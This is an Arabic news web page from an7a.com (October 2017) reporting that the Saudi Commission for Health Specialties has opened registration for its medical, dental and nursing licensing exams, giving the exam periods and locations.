</span>
</div>
</li>
<li>
<div class="news-image">
<a href="http://www.an7a.com/314930/" title="المملكة تؤكد استمرارها في تعزيز وحماية القضايا المتعلقة بالمرأة" class="image-link">
<img width="140" height="90" src="http://www.an7a.com/wp-content/uploads/2017/10/DL7aYUpXkAE9-d3-140x90.jpg" class="attachment-slider-thumbnail size-slider-thumbnail wp-post-image" alt="" srcset="http://www.an7a.com/wp-content/uploads/2017/10/DL7aYUpXkAE9-d3-140x90.jpg 140w, http://www.an7a.com/wp-content/uploads/2017/10/DL7aYUpXkAE9-d3-300x194.jpg 300w, http://www.an7a.com/wp-content/uploads/2017/10/DL7aYUpXkAE9-d3-557x360.jpg 557w, http://www.an7a.com/wp-content/uploads/2017/10/DL7aYUpXkAE9-d3.jpg 640w, http://www.an7a.com/wp-content/uploads/2017/10/DL7aYUpXkAE9-d3-140x90@2x.jpg 280w, http://www.an7a.com/wp-content/uploads/2017/10/DL7aYUpXkAE9-d3-300x194@2x.jpg 600w" sizes="(max-width: 140px) 100vw, 140px" /> </a>
</div>
<div class="news-content">
<a class="short-title" href="http://www.an7a.com/314930/" title="المملكة تؤكد استمرارها في تعزيز وحماية القضايا المتعلقة بالمرأة">المملكة تؤكد استمرارها في تعزيز وحماية القضاي...</a>
<span class="posted-on"><i class="fa fa-clock-o"></i>بتاريخ <span class="dtreviewed">
<time class="value-title" datetime="2017-10-12T13:19:00+03:00" title="2017-10-12" itemprop="datePublished">أكتوبر 12, 2017</time>
</span>
</span>
</div>
</li>
<li>
<div class="news-image">
<a href="http://www.an7a.com/314928/" title="إبادة شعب" class="image-link">
<img alt='عبده خال' src='http://an7a.com/wp-content/uploads/2012/08/عبده-خال_avatar-90x90.png' class='avatar avatar-90 photo' height='90' width='90' /> </a>
</div>
<div class="news-content">
<a class="short-title" href="http://www.an7a.com/314928/" title="إبادة شعب">إبادة شعب</a>
<span class="posted-on"><i class="fa fa-clock-o"></i>بتاريخ <span class="dtreviewed">
<time class="value-title" datetime="2017-10-12T08:16:36+03:00" title="2017-10-12" itemprop="datePublished">أكتوبر 12, 2017</time>
</span>
</span>
</div>
</li>
</ul>
</div>
</div>
</div>
<div class="main wrap cf">
<div class="row">
<div class="col-8 main-content">
<div class="breadcrumbs"><span class="location">أنت تتصفح:</span><span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a itemprop="url" href="http://www.an7a.com/"><span itemprop="title">الرئيسية</span></a></span><span class="delim">&raquo;</span><span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a itemprop="url" href="http://www.an7a.com/category/an7a-national/"><span itemprop="title">أنحاء الوطن</span></a></span><span class="delim">&raquo;</span><span class="current">&#8220;التخصصات الصحية&#8221; تعلن مواعيد اختبارات رخصة الممارسة المهنية</span></div> <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>

<ins class="adsbygoogle" style="display:inline-block;width:720px;height:90px" data-ad-client="ca-pub-6496713367516636" data-ad-slot="1672025708"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
﻿
<article id="post-314933" class="post-314933 post type-post status-publish format-standard has-post-thumbnail category-an7a-national tag-22661 tag-14602 tag-82756 tag-14342" itemscope itemtype="http://schema.org/Article">
<header class="post-header cf">
</a><h1 class="post-title item fn" itemprop="name">
&#8220;التخصصات الصحية&#8221; تعلن مواعيد اختبارات رخصة الممارسة المهنية
</h1>
<div class="post-meta">
<span class="posted-on">بتاريخ <span class="dtreviewed">
<time class="value-title" datetime="2017-10-12T13:33:30+03:00" title="2017-10-12" itemprop="datePublished">أكتوبر 12, 2017</time>
</span>
</span>
<span class="cats"><a href="http://www.an7a.com/category/an7a-national/" rel="category tag">أنحاء الوطن</a> | الكاتب : <a href="http://www.an7a.com/author/mona-sarhan/" title="مقالات mona sarhan" rel="author">mona sarhan</a></span></br>
<span class="post-meta"></span></br>
</span>
</div>
<div class="featured">
<a href="http://www.an7a.com/wp-content/uploads/2017/10/DL65ApBX0AAGZT3.jpg" title="&#8220;التخصصات الصحية&#8221; تعلن مواعيد اختبارات رخصة الممارسة المهنية" itemprop="image">
<img width="702" height="336" src="http://www.an7a.com/wp-content/uploads/2017/10/DL65ApBX0AAGZT3-702x336.jpg" class="attachment-main-slider size-main-slider wp-post-image" alt="" title="&#8220;التخصصات الصحية&#8221; تعلن مواعيد اختبارات رخصة الممارسة المهنية" />
</a>
</div>
</header>
<div class="post-share">
<span class="share-number">
<div class="fb-share-button" data-href="http://www.an7a.com/314933/" data-layout="button_count"></div>
<a href="https://twitter.com/share" class="twitter-share-button" data-url="http://www.an7a.com/314933/" data-text="&#8220;التخصصات الصحية&#8221; تعلن مواعيد اختبارات رخصة الممارسة المهنية" data-via="an7a_com">Tweet</a>
<script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0],p=/^http:/.test(d.location)?'http':'https';if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src=p+'://platform.twitter.com/widgets.js';fjs.parentNode.insertBefore(js,fjs);}}(document, 'script', 'twitter-wjs');</script>
<div class="g-plus" data-action="share" data-annotation="bubble"></div>
<a href="whatsapp://send" data-text="&#8220;التخصصات الصحية&#8221; تعلن مواعيد اختبارات رخصة الممارسة المهنية" data-href="http://www.an7a.com/314933/?utm_source=Whatsapp&utm_medium=Whatsapp&utm_campaign=Whatsapp" class="wa_btn wa_btn_s" title="Share on Whatsapp" style="display:none">واتس آب</a>
</span>
<span class="share-links">
<a href="javascript:window.print()" class="fa fa-print" title="طباعة">
<span class="visuallyhidden">طباعة الصفحة</span></a>
<a href="/cdn-cgi/l/email-protection#5a65292f38303f392e677f686c7f68696268686a7f69187f1e627f1b6d7f1e637f626e7f1e627f1b1b7f1e627f1b1f7f1e627f186f7f1e627f186f7f1e627f1b6d7f1e627f1b1b7f686a7f1e627f1b6d7f1e637f626e7f1e627f186f7f1e627f1b1e7f1e637f621b7f1e627f1b637f686c7f68696268686b7f69187f686a7f1e627f1b1b7f1e627f18637f1e637f626e7f1e637f626c7f686a7f1e637f626f7f1e637f62627f1e627f1b6d7f1e627f18637f1e637f621b7f1e627f1b1c7f686a7f1e627f1b6d7f1e627f1b1f7f1e627f1b1b7f1e627f1b627f1e627f1b6d7f1e627f186b7f1e627f1b6d7f1e627f1b1b7f686a7f1e627f186b7f1e627f1b1f7f1e627f186f7f1e627f1b637f686a7f1e627f1b6d7f1e637f626e7f1e637f626f7f1e637f626f7f1e627f1b6d7f1e627f186b7f1e627f18697f1e627f1b637f686a7f1e627f1b6d7f1e637f626e7f1e637f626f7f1e637f626d7f1e637f626c7f1e637f621b7f1e627f1b637c3b372a6138353e2367322e2e2a7f691b7f681c7f681c2d2d2d743b346d3b743935377f681c696b6e6369697f681c" class="fa fa-envelope-o" title="البريد الإلكتروني">
<span class="visuallyhidden">البريد الإلكتروني</span></a>
</span>
</div>
<div class="post-body">
<div class="post-container cf">
<div class="post-content-right">
<div class="post-content description " itemprop="articleBody">
<h3><span style="color: #ff0000;"><strong>الرياض &#8211; واس :-</strong></span></h3>
<h4><strong>أعلنت الهيئة السعودية للتخصصات الصحية فتح باب التقديم لاختبارات رخصة الممارسة المهنية للفترات الاختبارية الخامسة والسادسة والسابعة في تخصصات (الطب البشريSMLE، طب الأسنان SDLE، أخصائي التمريض SNLE) وذلك اعتباراً من يوم الاثنين القادم الموافق 16 اكتوبر 2017م.</strong></h4>
<h4><strong>وأوضح المتحدث الرسمي باسم الهيئة مدير عام الإعلام والاتصال عبدالله الزهيان، أن الفترة الاختبارية الخامسة ستكون بين 29 أكتوبر و23 نوفمبر، أما الفترة السادسة بين 3 و28 ديسمبر في حين ستكون الفترة الاختبارية السابعة بين 7 و31 يناير 2018، مشيراً إلى أن الاختبارات ستعقد خلال أيام العمل في 17 مدينة داخل المملكة بواقع 433 مقعد اختبار يومياً.</strong></h4>
<h4><strong>ولفت النظر إلى أنه لا يمكن الجلوس للاختبار في نفس الفترة الاختبارية مرتين و في هذه الحالة تعد نتيجة المحاولة الأولى فقط، مفيداً أن النتائج خلال فترة أسبوعين وحتى ستة أسابيع من نهاية الفترة الاختبارية عبر الرابط الإلكتروني https://goo.gl/pxDzNN .</strong></h4>
<h4><strong>وأضاف الزهيان أن اختبار الرخصة السعودية لمزاولة مهنة الطب يهدف إلى تحديد الكفاءات اللازمة للحصول على رخصة مزاولة المهنة بعد سنة الامتياز، والتأكد من استيفاء خريجي منشئات التعليم الصحية المعتمدة للحد الأدنى من معايير مزاولة المهنة، وتوحيد معايير المفاضلة بين المرشحين المتقدمين لبرامج الدراسات العليا، مشيراً إلى أن المؤهلون لدخول الاختبارطلبة الكليات الصحية بالمملكة خلال سنتهم الدراسية الأخيرة، والحاصلون على شهادة البكالوريوس ?أو ما يعادلها من كلية صحية في خارج المملكة, معترف بها ومعادلة من وزارة التعليم</strong></h4>
<div class="tagcloud"><a href="http://www.an7a.com/tag/%d8%a7%d8%ae%d8%aa%d8%a8%d8%a7%d8%b1%d8%a7%d8%aa/" rel="tag">اختبارات</a> <a href="http://www.an7a.com/tag/%d8%a7%d9%84%d9%87%d9%8a%d8%a6%d8%a9-%d8%a7%d9%84%d8%b3%d8%b9%d9%88%d8%af%d9%8a%d8%a9-%d9%84%d9%84%d8%aa%d8%ae%d8%b5%d8%b5%d8%a7%d8%aa-%d8%a7%d9%84%d8%b5%d8%ad%d9%8a%d8%a9/" rel="tag">الهيئة السعودية للتخصصات الصحية</a> <a href="http://www.an7a.com/tag/%d8%b1%d8%ae%d8%b5%d8%a9-%d8%a7%d9%84%d9%85%d9%85%d8%a7%d8%b1%d8%b3%d8%a9-%d8%a7%d9%84%d9%85%d9%87%d9%86%d9%8a%d8%a9/" rel="tag">رخصة الممارسة المهنية</a> <a href="http://www.an7a.com/tag/%d9%85%d9%88%d8%a7%d8%b9%d9%8a%d8%af/" rel="tag">مواعيد</a></div>
</div>
</div>
</div>
</div>
</article>
<div id="POSTQUARE_WIDGET_89259"></div>
<script style="display: none !important;">!function(e,t,r,n,c,a,l){function i(t,r){return r=e.createElement('div'),r.innerHTML='<a href="'+t.replace(/"/g,'&quot;')+'"></a>',r.childNodes[0].getAttribute('href')}function o(e,t,r,n){for(r='',n='0x'+e.substr(t,2)|0,t+=2;t<e.length;t+=2)r+=String.fromCharCode('0x'+e.substr(t,2)^n);return i(r)}try{for(c=e.getElementsByTagName('a'),l='/cdn-cgi/l/email-protection#',n=0;n<c.length;n++)try{(t=(a=c[n]).href.indexOf(l))>-1&&(a.href='mailto:'+o(a.href,t+l.length))}catch(e){}for(c=e.querySelectorAll('.__cf_email__'),n=0;n<c.length;n++)try{(a=c[n]).parentNode.replaceChild(e.createTextNode(o(a.getAttribute('data-cfemail'),0)),a)}catch(e){}}catch(e){}}(document);</script><script>
(function(P,o,s,t,Q,r,e){P['PostquareObject']=Q;P[Q]=P[Q]||function(){ (P[Q].q=P[Q].q||[]).push(arguments)},P[Q].l=1*new Date();r=o.createElement(s), e=o.getElementsByTagName(s)[0];r.async=1;r.src=t;e.parentNode.insertBefore(r,e) })(window,document,'script','//widget.engageya.com/_pos_loader.js','__posWidget');
__posWidget('createWidget',{wwei:'POSTQUARE_WIDGET_89259',pubid:165771,webid:129915,wid:89259,on:'postquare'});
</script>
</section>
<section class="gallery-block related-posts">
<h3 class="section-head">قد ترغب أيضًا بقراءة</h3>
<div class="flexslider carousel">
<ul class="slides three-col related-posts">
<li>
<a href="http://www.an7a.com/314942/" title="&#8220;التأمينات&#8221;: 1500 ريال الحد الأدنى للاشتراك في المعاشات و400 ريال للأخطار المهنية" class="image-link">
<span class="image"><img width="336" height="220" src="http://www.an7a.com/wp-content/uploads/2017/10/485c352c-4f7d-47aa-b095-428e16282476-336x220.jpg" class="attachment-gallery-block size-gallery-block wp-post-image" alt="" title="" /> </span>
</a>
<div class="post-body">
<h4 class="title"><a href="http://www.an7a.com/314942/" title="&#8220;التأمينات&#8221;: 1500 ريال الحد الأدنى للاشتراك في المعاشات و400 ريال للأخطار المهنية">“التأمينات”: 1500 ريال الحد الأدنى للاشتراك ف...</a></h4>
<span class="posted-on"><i class="fa fa-clock-o"></i>بتاريخ <span class="dtreviewed">
<time class="value-title" datetime="2017-10-12T14:39:25+03:00" title="2017-10-12" itemprop="datePublished">أكتوبر 12, 2017</time>
</span>
</span>
<div class="post-excerpt">
<p>(أنحاء) &#8211; متابعات :- قالت المؤسسة العامة للتأمينات الاجتماعية إن الحد الأدنى للاشتراك في فرع المعاشات 1500 ريال،</p>
</div>
</div>
</li>
<li>
<a href="http://www.an7a.com/314941/" title="&#8220;الداخلية&#8221;: تنفيذ &#8220;حد الحرابة&#8221; في هنديين قتلا بنغلاديشياً في الرياض" class="image-link">
<span class="image"><img width="336" height="189" src="http://www.an7a.com/wp-content/uploads/2014/11/94.jpg" class="attachment-gallery-block size-gallery-block wp-post-image" alt="" title="" srcset="http://www.an7a.com/wp-content/uploads/2014/11/94.jpg 640w, http://www.an7a.com/wp-content/uploads/2014/11/94-300x168.jpg 300w" sizes="(max-width: 336px) 100vw, 336px" /> </span>
</a>
<div class="post-body">
<h4 class="title"><a href="http://www.an7a.com/314941/" title="&#8220;الداخلية&#8221;: تنفيذ &#8220;حد الحرابة&#8221; في هنديين قتلا بنغلاديشياً في الرياض">“الداخلية”: تنفيذ “حد الحرابة” في هنديين قتلا...</a></h4>
<span class="posted-on"><i class="fa fa-clock-o"></i>بتاريخ <span class="dtreviewed">
<time class="value-title" datetime="2017-10-12T14:28:12+03:00" title="2017-10-12" itemprop="datePublished">أكتوبر 12, 2017</time>
</span>
</span>
<div class="post-excerpt">
<p>الرياض &#8211; واس :- أصدرت وزارة الداخلية اليوم بياناً حول تنفيذ حكم القتل (حد الحرابة) في جانيين بمدينة</p>
</div>
</div>
</li>
<li>
<a href="http://www.an7a.com/314939/" title="حرس الحدود يوضح حقيقة حرمان اللائحة البحرية للمرأة من الخروج في رحلة بحرية برفقة أبنائها" class="image-link">
<span class="image"><img width="336" height="220" src="http://www.an7a.com/wp-content/uploads/2017/10/59dea1567ff3c-336x220.jpg" class="attachment-gallery-block size-gallery-block wp-post-image" alt="" title="" /> </span>
</a>
<div class="post-body">
<h4 class="title"><a href="http://www.an7a.com/314939/" title="حرس الحدود يوضح حقيقة حرمان اللائحة البحرية للمرأة من الخروج في رحلة بحرية برفقة أبنائها">حرس الحدود يوضح حقيقة حرمان اللائحة البحرية ل...</a></h4>
<span class="posted-on"><i class="fa fa-clock-o"></i>بتاريخ <span class="dtreviewed">
<time class="value-title" datetime="2017-10-12T14:03:06+03:00" title="2017-10-12" itemprop="datePublished">أكتوبر 12, 2017</time>
</span>
</span>
<div class="post-excerpt">
<p>(أنحاء) &#8211; متابعات :- كشف المتحدث الرسمي لحرس الحدود ما ورد في التقرير الصحفي المنسوب لرئيس لجنة سياحة</p>
</div>
</div>
</li>
<li>
<a href="http://www.an7a.com/314932/" title="&#8220;الداخلية&#8221;: القتل تعزيراً بحق &#8220;فلسطيني وسعودي&#8221;.. أدينا بالمشاركة في تلقي كمية كبيرة من &#8220;الإمفيتامين&#8221;" class="image-link">
<span class="image"><img width="336" height="189" src="http://www.an7a.com/wp-content/uploads/2014/08/2-نسخ1.jpg" class="attachment-gallery-block size-gallery-block wp-post-image" alt="" title="" srcset="http://www.an7a.com/wp-content/uploads/2014/08/2-نسخ1.jpg 640w, http://www.an7a.com/wp-content/uploads/2014/08/2-نسخ1-300x168.jpg 300w" sizes="(max-width: 336px) 100vw, 336px" /> </span>
</a>
<div class="post-body">
<h4 class="title"><a href="http://www.an7a.com/314932/" title="&#8220;الداخلية&#8221;: القتل تعزيراً بحق &#8220;فلسطيني وسعودي&#8221;.. أدينا بالمشاركة في تلقي كمية كبيرة من &#8220;الإمفيتامين&#8221;">“الداخلية”: القتل تعزيراً بحق “فلسطيني وسعودي...</a></h4>
<span class="posted-on"><i class="fa fa-clock-o"></i>بتاريخ <span class="dtreviewed">
<time class="value-title" datetime="2017-10-12T13:24:22+03:00" title="2017-10-12" itemprop="datePublished">أكتوبر 12, 2017</time>
</span>
</span>
<div class="post-excerpt">
<p>(أنحاء) &#8211; متابعات :- نفذت وزارة الداخلية اليوم الخميس حكم القتل تعزيراً في محافظة القريات بمنطقة الجوف بحق</p>
</div>
</div>
</li>
</ul>
</div>
<div class="comments">
<div id="comments">
<div id="respond" class="comment-respond">
<h3 id="reply-title" class="comment-reply-title"><span class="section-head">إضافة تعليق</span> <small><a rel="nofollow" id="cancel-comment-reply-link" href="/314933/#respond" style="display:none;">إلغاء الرد</a></small></h3> <form action="http://www.an7a.com/wp-comments-post.php" method="post" id="commentform" class="comment-form" novalidate>
<p>
<textarea name="comment" id="comment" cols="45" rows="8" aria-required="true" placeholder="علّق بما يفيد غيرك..."></textarea>
</p>
<p class="half">
<input name="author" id="author" type="text" value="" size="30" aria-required="true" placeholder="الاسم" />
</p>
<p class="half">
<input name="email" id="email" type="text" value="" size="30" aria-required="true" placeholder="البريد الإلكتروني" />
</p>
<p class="form-submit"><input name="submit" type="submit" id="comment-submit" class="submit" value="إرسال" /> <input type='hidden' name='comment_post_ID' value='314933' id='comment_post_ID' />
<input type='hidden' name='comment_parent' id='comment_parent' value='0' />
</p><p style="display: none;"><input type="hidden" id="akismet_comment_nonce" name="akismet_comment_nonce" value="71832fad93" /></p><p style="display: none;"><input type="hidden" id="ak_js" name="ak_js" value="29" /></p> </form>
</div>
</div>
</div>
</div>
<aside class="col-4 sidebar">
<div class="">
<ul>
<li id="text-3" class="widget widget_text"> <div class="textwidget"><div class="sidebar-social-icon cf">
<a href="https://plus.google.com/100917030281374462488">
<div class="googleplus social-icon">
<i class="icon fa fa-google-plus"></i>
<span>2,405</span>
</div>
</a>
<a href="https://www.youtube.com/user/an7acom">
<div class="youtube social-icon">
<i class="icon fa fa-play"></i>
<span>18,752</span>
</div>
</a>
<a href="http://www.twitter.com/an7a_com">
<div class="twitter social-icon">
<i class="icon fa fa-twitter"></i>
<span>276,968</span>
</div>
</a>
<a href="http://www.facebook.com/an7acom">
<div class="facebook social-icon">
<i class="icon fa fa-facebook"></i>
<span> 58,199</span>
</div>
</a>
</div></div>
</li>

<li id="wpp-2" class="widget popular-posts">
<h3 class="widgettitle">الأكثر قراءة</h3><p class="wpp-no-data">Sorry. No data so far.</p></li>

<div id="widget-an7a-article" class="widget">
<h3 class="widgettitle">كتّاب أنحاء</h3>
<ul class="posts-list">
<li>
<a href="http://www.an7a.com/314926/"><img alt='حامد الشريف' src='http://www.an7a.com/wp-content/uploads/2017/08/حامد-الشريف_avatar_1502818321-85x85.jpeg' class='avatar avatar-85 photo' height='85' width='85' /></a>
<div class="content">
<a href="http://www.an7a.com/author/h_motafael_an7a" class="author">حامد الشريف</a>
<a href="http://www.an7a.com/314926/" class="title">رياضتنا .. راقصة .. وطبال</a>
</div>
</li>
<li>
<a href="http://www.an7a.com/314879/"><img alt='د. نشمي العنزي' src='http://www.an7a.com/wp-content/uploads/2017/10/د.-نشمي-العنزي_avatar_1507738270-85x85.jpeg' class='avatar avatar-85 photo' height='85' width='85' /></a>
<div class="content">
<a href="http://www.an7a.com/author/nashmialanazi" class="author">د. نشمي العنزي</a>
<a href="http://www.an7a.com/314879/" class="title">بك تزهو وتتشرف الدكتوراه يا خادم الحرمين الشريفين</a>
</div>
</li>
<li>
<a href="http://www.an7a.com/314878/"><img alt='سلمان الجابري' src='http://www.an7a.com/wp-content/uploads/2017/08/سلمان-الجابري_avatar_1502910703-85x85.jpeg' class='avatar avatar-85 photo' height='85' width='85' /></a>
<div class="content">
<a href="http://www.an7a.com/author/salman-aljabri" class="author">سلمان الجابري</a>
<a href="http://www.an7a.com/314878/" class="title">ذاك اليتيم يقدم دورة في السعادة</a>
</div>
</li>
<li>
<a href="http://www.an7a.com/314750/"><img alt='حامد الشريف' src='http://www.an7a.com/wp-content/uploads/2017/08/حامد-الشريف_avatar_1502818321-85x85.jpeg' class='avatar avatar-85 photo' height='85' width='85' /></a>
<div class="content">
<a href="http://www.an7a.com/author/h_motafael_an7a" class="author">حامد الشريف</a>
<a href="http://www.an7a.com/314750/" class="title">طلاء .. الهواء</a>
</div>
</li>
<li>
<a href="http://www.an7a.com/314685/"><img alt='محمد سلامة' src='http://www.an7a.com/wp-content/uploads/2016/06/محمد-سلامة_avatar_1465413245-85x85.jpg' class='avatar avatar-85 photo' height='85' width='85' /></a>
<div class="content">
<a href="http://www.an7a.com/author/mohamed-salama" class="author">محمد سلامة</a>
<a href="http://www.an7a.com/314685/" class="title">&#8220;مسك آرت&#8221; تنطلق بقوافلها حاملة الفن السعودي عبر طريق البخور !</a>
</div>
</li>
<li>
<a href="http://www.an7a.com/314502/"><img alt='عبدالعزيز قاسم' src='http://www.an7a.com/wp-content/uploads/2017/07/عبدالعزيز-قاسم_avatar_1501526865-85x85.jpeg' class='avatar avatar-85 photo' height='85' width='85' /></a>
<div class="content">
<a href="http://www.an7a.com/author/azizkasem" class="author">عبدالعزيز قاسم</a>
<a href="http://www.an7a.com/314502/" class="title">المرأة ..أنظمةٌ آن أوان تحديثها</a>
</div>
</li>
<li>
<a href="http://www.an7a.com/314263/"><img alt='صالح جريبيع الزهراني' src='http://www.an7a.com/wp-content/uploads/2016/11/صالح-جريبيع-الزهراني_avatar_1479638576-85x85.jpg' class='avatar avatar-85 photo' height='85' width='85' /></a>
<div class="content">
<a href="http://www.an7a.com/author/saleh-zahrani" class="author">صالح جريبيع الزهراني</a>
<a href="http://www.an7a.com/314263/" class="title">جامعة الوسواس</a>
</div>
</li>
</ul>
<div class="fix"></div>
</div>
<li id="text-8" class="widget widget_text"><h3 class="widgettitle">اعلان</h3> <div class="textwidget"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>

<ins class="adsbygoogle" style="display:inline-block;width:160px;height:600px" data-ad-client="ca-pub-6496713367516636" data-ad-slot="3427960506"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script></div>
</li>
<div id="widget-newspaper-article" class="widget">
<h3 class="widgettitle">كتّاب الصحف</h3>
<ul class="posts-list">
<li>
<a href="http://www.an7a.com/314928/"><img alt='عبده خال' src='http://an7a.com/wp-content/uploads/2012/08/عبده-خال_avatar.png' class='avatar avatar-85 photo' height='85' width='85' /></a>
<div class="content">
<a href="http://www.an7a.com/author/hkhal" class="author">عبده خال</a>
<a href="http://www.an7a.com/314928/" class="title">إبادة شعب</a>
<div class="fix"></div>
</div>
</li>
<li>
<a href="http://www.an7a.com/314927/"><img alt='محمد الساعد' src='http://an7a.com/wp-content/uploads/2012/12/محمد-الساعد_avatar.jpg' class='avatar avatar-85 photo' height='85' width='85' /></a>
<div class="content">
<a href="http://www.an7a.com/author/saasa" class="author">محمد الساعد</a>
<a href="http://www.an7a.com/314927/" class="title">الفاتيكان.. بين ملكين وشيخين !</a>
<div class="fix"></div>
</div>
</li>
<li>
<a href="http://www.an7a.com/314575/"><img alt='أحمد الفراج' src='http://www.an7a.com/wp-content/uploads/2013/10/أحمد-الفراج_avatar_1381586714-85x85.jpg' class='avatar avatar-85 photo' height='85' width='85' /></a>
<div class="content">
<a href="http://www.an7a.com/author/alfarraj" class="author">أحمد الفراج</a>
<a href="http://www.an7a.com/314575/" class="title">من يحرِّر مصطلح «الإرهاب»؟!</a>
<div class="fix"></div>
</div>
</li>
<li>
<a href="http://www.an7a.com/314574/"><img alt='عبده خال' src='http://an7a.com/wp-content/uploads/2012/08/عبده-خال_avatar.png' class='avatar avatar-85 photo' height='85' width='85' /></a>
<div class="content">
<a href="http://www.an7a.com/author/hkhal" class="author">عبده خال</a>
<a href="http://www.an7a.com/314574/" class="title">أنا مختلف..!</a>
<div class="fix"></div>
</div>
</li>
<li>
<a href="http://www.an7a.com/314573/"><img alt='حمود أبو طالب' src='http://www.an7a.com/wp-content/uploads/2013/09/حمود-أبو-طالب_avatar_1380180344-85x85.jpg' class='avatar avatar-85 photo' height='85' width='85' /></a>
<div class="content">
<a href="http://www.an7a.com/author/hammod" class="author">حمود أبو طالب</a>
<a href="http://www.an7a.com/314573/" class="title">الأمم المتحدة ورعاية الفوضى</a>
<div class="fix"></div>
</div>
</li>
<li>
<a href="http://www.an7a.com/314572/"><img alt='محمد الساعد' src='http://an7a.com/wp-content/uploads/2012/12/محمد-الساعد_avatar.jpg' class='avatar avatar-85 photo' height='85' width='85' /></a>
<div class="content">
<a href="http://www.an7a.com/author/saasa" class="author">محمد الساعد</a>
<a href="http://www.an7a.com/314572/" class="title">المزاج في موسكو ساعة وصول الملك</a>
<div class="fix"></div>
</div>
</li>
<li>
<a href="http://www.an7a.com/314571/"><img alt='خلف الحربي' src='http://an7a.com/wp-content/uploads/2012/08/خلف-الحربي_avatar.jpg' class='avatar avatar-85 photo' height='85' width='85' /></a>
<div class="content">
<a href="http://www.an7a.com/author/khalaf" class="author">خلف الحربي</a>
<a href="http://www.an7a.com/314571/" class="title">البحث عن ذوي النملة</a>
<div class="fix"></div>
</div>
</li>
</ul>
<div class="fix"></div>
</div>
<li id="postsfromcategorywidget-8" class="widget widget_postsfromcategorywidget"><h3 class="widgettitle">الكاريكاتير</h3><div class="post-cat-widget"><div class="category-6240 post size-large odd"><div class="post-thumb"><a href="http://www.an7a.com/311401/"><img width="466" height="360" src="http://www.an7a.com/wp-content/uploads/2017/09/4-4-466x360.jpeg" class="attachment-large size-large wp-post-image" alt="" srcset="http://www.an7a.com/wp-content/uploads/2017/09/4-4-466x360.jpeg 466w, http://www.an7a.com/wp-content/uploads/2017/09/4-4-300x232.jpeg 300w, http://www.an7a.com/wp-content/uploads/2017/09/4-4.jpeg 1280w, http://www.an7a.com/wp-content/uploads/2017/09/4-4-466x360@2x.jpeg 932w, http://www.an7a.com/wp-content/uploads/2017/09/4-4-300x232@2x.jpeg 600w" sizes="(max-width: 466px) 100vw, 466px" /></a></div><div class="post-content"><h2 class="post-title"><a href="http://www.an7a.com/311401/">قطر كاريكاتيراً..!</a></h3></div></li>
<li id="postsfromcategorywidget-6" class="widget widget_postsfromcategorywidget"><h3 class="widgettitle">هنا وهناك</h3><div class="post-cat-widget"><div class="category-6239 post size-large odd"><div class="post-thumb"><a href="http://www.an7a.com/314880/"><img width="600" height="338" src="http://www.an7a.com/wp-content/uploads/2017/10/1-27.jpg" class="attachment-large size-large wp-post-image" alt="" srcset="http://www.an7a.com/wp-content/uploads/2017/10/1-27-300x169@2x.jpg 600w, http://www.an7a.com/wp-content/uploads/2017/10/1-27-300x169.jpg 300w" sizes="(max-width: 600px) 100vw, 600px" /></a></div><div class="post-content"><h2 class="post-title"><a href="http://www.an7a.com/314880/">واقعة أثارت الجدل .. سيدة مصرية تحضر حفل زفاف زوجها | صور</a></h3></div></li>
<li id="postsfromcategorywidget-5" class="widget widget_postsfromcategorywidget"><h3 class="widgettitle">حوار مع مغرد</h3><div class="post-cat-widget"><div class="category-6233 post size-large odd"><div class="post-thumb"><a href="http://www.an7a.com/305378/"><img width="640" height="360" src="http://www.an7a.com/wp-content/uploads/2017/07/19883433_1094915087306913_1521824267_n.jpg" class="attachment-large size-large wp-post-image" alt="" srcset="http://www.an7a.com/wp-content/uploads/2017/07/19883433_1094915087306913_1521824267_n.jpg 640w, http://www.an7a.com/wp-content/uploads/2017/07/19883433_1094915087306913_1521824267_n-300x169.jpg 300w, http://www.an7a.com/wp-content/uploads/2017/07/19883433_1094915087306913_1521824267_n-300x169@2x.jpg 600w" sizes="(max-width: 640px) 100vw, 640px" /></a></div><div class="post-content"><h2 class="post-title"><a href="http://www.an7a.com/305378/">عناد المطيري: تويتر منعني كثيرًا من إكمال قصائدي.. ولا أعرف فهد المساعد</a></h3></div></li>
<li id="postsfromcategorywidget-7" class="widget widget_postsfromcategorywidget"><h3 class="widgettitle">العالم صوره</h3><div class="post-cat-widget"><div class="category-6242 post size-large odd"><div class="post-thumb"><a href="http://www.an7a.com/312011/"><img width="539" height="360" src="http://www.an7a.com/wp-content/uploads/2017/09/5-19-539x360.jpg" class="attachment-large size-large wp-post-image" alt="" srcset="http://www.an7a.com/wp-content/uploads/2017/09/5-19-539x360.jpg 539w, http://www.an7a.com/wp-content/uploads/2017/09/5-19-300x200.jpg 300w, http://www.an7a.com/wp-content/uploads/2017/09/5-19.jpg 899w, http://www.an7a.com/wp-content/uploads/2017/09/5-19-300x200@2x.jpg 600w" sizes="(max-width: 539px) 100vw, 539px" /></a></div></li>
</ul>
</div>
</aside>
</div> 
</div> 
<footer class="main-footer">
<div class="lower-foot">
<div class="wrap">
<div class="widgets">
<div class="textwidget"><ul class="social-icons">
<li><a href="mailto:" class="icon fa fa-envelope" title="Mail"><span class="visuallyhidden">Mail</span></a></li>
<li><a href="/?feed=rss2" class="icon fa fa-rss" title="RSS"><span class="visuallyhidden">RSS</span></a></li>
<li><a href="http://www.youtube.com/an7acom" class="icon fa fa-play" title="YouTube"><span class="visuallyhidden">YouTube</span></a></li>
<li><a href="https://plus.google.com/100917030281374462488" class="icon fa fa-google-plus" title="Google+"><span class="visuallyhidden">Google+</span></a></li>
<li><a href="http://www.twitter.com/an7a_com" class="icon fa fa-twitter" title="Twitter"><span class="visuallyhidden">Twitter</span></a></li>
<li><a href="http://www.facebook.com/an7acom" class="icon fa fa-facebook" title="Facebook"><span class="visuallyhidden">Facebook</span></a></li>
</ul></div>
</div>
<div class="search">
<form role="search" action="http://www.an7a.com/" method="get">
<input type="text" name="s" class="query live-search-query" value="" placeholder="بحث..." />
<button class="search-button" type="submit"><i class="fa fa-search"></i></button>
</form>
</div> 
</div>
</div>
<div class="wrap">
<ul class="widgets row cf">
<li class="widget col-3 popular-posts"> <h3 class="widgettitle">الأكثر شعبية</h3>
<ul class="posts-list">
<li>
